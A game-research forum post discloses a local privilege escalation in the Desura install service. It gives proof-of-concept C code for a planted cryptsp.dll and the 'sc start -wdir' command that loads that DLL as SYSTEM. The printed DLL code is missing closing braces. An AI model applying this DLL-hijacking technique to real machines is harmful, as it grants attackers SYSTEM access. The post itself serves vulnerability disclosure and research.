Free Game Research Forum | Official QuickBMS support | twitter @zenhax
It is currently Thu Dec 01, 2022 10:47 pm

All times are UTC

Post new topic  Reply to topic  [ 1 post ] 
Author Message
PostPosted: Fri Aug 15, 2014 7:33 pm 
Site Admin
User avatar

Joined: Wed Jul 30, 2014 9:32 pm
Posts: 12984
The following was a quick test I made in the far October 2012 and it's still working.

"Desura is a digital distribution platform developed by Linden Research":

Basically it's a competitor of Steam that, I remember, was mainly focused on indie games and then has been bought by Linden, the guys behind Second Life.

Anyway it's just a local privilege escaltion to become SYSTEM by using an option of the installer service, not so important but interesting to show.

Compile a dll with the name cryptsp.dll, the following is a quick example of dll for testing if you are able to write in a folder that requires Administrator privileges:
#include <windows.h>
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ulReason, LPVOID lpReserved) {
    if(ulReason == DLL_PROCESS_ATTACH) {
        system("echo HELLO > c:\\windows\\poc.txt");
    return TRUE;

Create an empty folder called bin and put the dll there.

Kill/close the Desura client if it's running.

Let's say your current folder is z:\poc and the dll is located in z:\poc\bin\cryptsp.dll
Now start the service (any user can do that, just like with Steam) using the -wdir option:
sc start "Desura Install Service" -wdir z:\poc

That's all.

Source code of Desura Service:
https://github.com/desura/Desurium/blob ... ceMain.cpp

If you want to read about something similar for Steam:
http://revuln.com/files/ReVuln_Steam_Se ... curity.pdf

Display posts from previous:  Sort by  
Post new topic  Reply to topic  [ 1 post ] 

All times are UTC

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Powered by phpBB® Forum Software © phpBB Limited